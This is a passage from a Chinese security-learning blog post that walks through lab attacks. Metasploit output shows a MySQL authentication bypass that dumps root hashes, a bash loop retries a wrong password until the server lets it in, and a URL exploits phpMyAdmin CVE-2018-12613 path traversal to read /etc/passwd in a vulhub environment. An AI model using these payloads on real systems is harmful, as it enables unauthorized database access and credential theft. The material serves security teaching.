<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 10% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 20% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 30% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 40% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 50% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 60% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 70% complete
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 80% complete
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Successfully bypassed authentication after 847 attempts. URI: mysql://root:DBrmCST@10.1.1.133:3306
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Successfully exploited the authentication bypass flaw, dumping hashes<span class="token punctuation">..</span>.
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 Hash Table has been saved: /root/.msf4/loot/20210608111341_default_10.1.1.133_mysql.hashes_091970.txt
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> 10.1.1.133:3306       - Scanned 1 of 1 hosts <span class="token punctuation">(</span>100% complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Auxiliary module execution completed

md5在线解密
https://www.cmd5.com/
</code></pre>
<p><img src="/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/2.png"></p>
<pre class=" language-bash"><code class="language-bash">└─<span class="token comment" spellcheck="true"># mysql -uroot -p123456 -h10.1.1.133</span>
Welcome to the MariaDB monitor.  Commands end with <span class="token punctuation">;</span> or \g.
Your MySQL connection <span class="token function">id</span> is 886
Server version: 5.5.23 Source distribution

Copyright <span class="token punctuation">(</span>c<span class="token punctuation">)</span> 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type <span class="token string">'help;'</span> or <span class="token string">'\h'</span> <span class="token keyword">for</span> help. Type <span class="token string">'\c'</span> to <span class="token function">clear</span> the current input statement.

MySQL <span class="token punctuation">[</span><span class="token punctuation">(</span>none<span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token operator">></span> show databases<span class="token punctuation">;</span>
+--------------------+
<span class="token operator">|</span> Database           <span class="token operator">|</span>
+--------------------+
<span class="token operator">|</span> information_schema <span class="token operator">|</span>
<span class="token operator">|</span> mysql              <span class="token operator">|</span>
<span class="token operator">|</span> performance_schema <span class="token operator">|</span>
<span class="token operator">|</span> <span class="token function">test</span>               <span class="token operator">|</span>
+--------------------+
4 rows <span class="token keyword">in</span> <span class="token keyword">set</span> <span class="token punctuation">(</span>0.001 sec<span class="token punctuation">)</span>
</code></pre>
<p><font size="3"><strong>方法2</strong></font></p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root💀kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~<span class="token punctuation">]</span>
└─<span class="token comment" spellcheck="true"># for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.1.1.133 -P 3306; done                                                                                                      130 ⨯</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
ERROR 1045 <span class="token punctuation">(</span>28000<span class="token punctuation">)</span>: Access denied <span class="token keyword">for</span> user <span class="token string">'root'</span>@<span class="token string">'10.1.1.128'</span> <span class="token punctuation">(</span>using password: YES<span class="token punctuation">)</span>
Welcome to the MariaDB monitor.  Commands end with <span class="token punctuation">;</span> or \g.
Your MySQL connection <span class="token function">id</span> is 1553
Server version: 5.5.23 Source distribution

Copyright <span class="token punctuation">(</span>c<span class="token punctuation">)</span> 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type <span class="token string">'help;'</span> or <span class="token string">'\h'</span> <span class="token keyword">for</span> help. Type <span class="token string">'\c'</span> to <span class="token function">clear</span> the current input statement.

MySQL <span class="token punctuation">[</span><span class="token punctuation">(</span>none<span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token operator">></span>
</code></pre>
<h4 id="4、某第三方应用安全漏洞演示"><a href="#4、某第三方应用安全漏洞演示" class="headerlink" title="4、某第三方应用安全漏洞演示"></a><font size="4"><strong>4、某第三方应用安全漏洞演示</strong></font></h4><p><a target="_blank" rel="noopener" href="https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/">https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/</a><br>环境搭建</p>
<pre class=" language-bash"><code class="language-bash"><span class="token punctuation">[</span>root@hdss7-11 CVE-2018-12613<span class="token punctuation">]</span><span class="token comment" spellcheck="true"># pwd</span>
/opt/vulhub/vulhub-master/phpmyadmin/CVE-2018-12613
<span class="token punctuation">[</span>root@hdss7-11 CVE-2018-12613<span class="token punctuation">]</span><span class="token comment" spellcheck="true"># docker-compose up -d</span>
</code></pre>
<p><img src="/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/3.png"></p>
<p>漏洞利用<br><a href="http://10.1.1.133:8080/?target=db_sql.php%253f/../../../../../../../../etc/passwd">http://10.1.1.133:8080/?target=db_sql.php%253f/../../../../../../../../etc/passwd</a></p>
<p><img src="/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/4.png"></p>
<h3 id="五、涉及资源："><a href="#五、涉及资源：" class="headerlink" title="五、涉及资源："></a><font size="5"><strong>五、涉及资源：</strong></font></h3><p><a target="_blank" rel="noopener" href="https://nmap.org/">https://nmap.org/</a><br><a target="_blank" rel="noopener" href="https://www.kali.org/downloads/">https://www.kali.org/downloads/</a><br><a target="_blank" rel="noopener" href="https://github.com/hellogoldsnakeman/masnmapscan-V1.0">https://github.com/hellogoldsnakeman/masnmapscan-V1.0</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">爱睡懒觉的道士</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/">http://example.com/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">爱睡懒觉的道士</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">web安全</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/09/19/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-006/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/22.jpg" class="responsive-img" alt="web安全日志-006">
                        
                        <span class="card-title">web安全日志-006</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            基础入门-加密编码算法
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-09-19
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                    web安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/09/17/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-004/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="web安全日志-004">
                        
                        <span class="card-title">web安全日志-004</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            基础入门-WEB源码拓展
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-09-17
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                    web安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 爱睡懒觉的道士<br />'
            + '文章作者: 爱睡懒觉的道士<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='list'
                   preload='auto'
                   volume='0.7'
                   list-folded='false'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022-2023</span>
            
            <span id="year">2022</span>
            <a href="/about" target="_blank">爱睡懒觉的道士</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">27.1k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2022";
                    var startMonth = "6";
                    var startDate = "28";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/daoshi-sec" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:3108435080@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=3108435080" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 3108435080" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    



    <script src="/js/snow.js"></script>


    

    <!--动态线条背景-->
<script type="text/javascript"
color="138,43,226" opacity='0.7' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>

    <!--深夜模式---->
    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
